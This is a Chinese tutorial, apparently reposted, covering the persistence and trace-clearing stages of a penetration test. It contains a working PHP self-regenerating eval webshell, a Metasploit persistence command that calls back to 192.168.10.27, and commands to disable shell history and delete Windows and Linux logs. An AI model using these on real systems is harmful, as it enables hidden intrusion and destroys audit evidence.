zl程序教程

您现在的位置是:首页 >  其他

当前栏目

一次完整的渗透测试流程是这样的(下)

流程测试 一次 完整 渗透 这样
2023-09-14 09:10:52 时间

2、权限维持

在拿到目标主机的权限后,很有可能当时我们并不能获取到想要的东西,需要进行长期的潜伏,特别是在内网渗透中,需要进行长期的信息收集。这时,权限维持就很重要了。我们需要维持住获得的现有权限。

1)Web后门

1:隐藏后门文件(将文件设置为隐藏)

2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。

<?php set_time_limit(0);//程序执行时间 ignore_user_abort(1);//关掉终端后脚本仍然运行 unlink(__FILE__);//文件完整名 while(1){ file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3"); $b=array_keys($a)[0]; eval($b);?>');
    sleep(5);

}

?>

3:404页面隐藏后门,或者在其他自带文件中插入后门代码

(注:以上几种后门方法均能被D盾等工具检测到)

2)Windows系统

1:建立隐藏用户,在用户名后加 $

2:在开机启动目录下放置木马文件,只要目标机器重启,将回连我们的远控

3:MSF里的 persistence 模块,执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现#反弹时间间隔是5s会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀:

run persistence -X -i 5 -p 8888 -r 192.168.10.27#

然后它就在目标机新建了这个文件:

C:\Windows\TEMP\CJzhFlNOWa.vbs

并把该服务加入了注册表中,只要开机就会启动。

4:在域环境下,想办法获得 krbtgt 用户的哈希,该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。

5:shift后门

6:远程桌面会话劫持

3)Linux系统

1:SSH后门

2:crontab定时任务

3:SSH公钥

4:创建SUID=0的用户

4)痕迹清除

当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!

我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。

最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。

5)Windows系统

1:如果是windows系统,可用MSF中的 clearev 命令清除痕迹

2:如果3389远程登录过,需要清除mstsc痕迹

3:执行命令清除日志:

del %WINDR%* .log /a/s/q/f

4:如果是web应用,找到web日志文件,删除

6)Linux系统

1:如果是Linux系统,在获取权限后,执行以下命令,不会记录输入过的命令

export HISTFILE=/dev/null export HISTSIZE=0

2:删除 /var/log 目录下的日志文件

3:如果是web应用,找到web日志文件,删除

3、撰写渗透测试保告

在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!

文章来源:网络 版权归原作者所有

上文内容不用于商业目的,如涉及知识产权问题,请权利人联系小编,我们将立即处理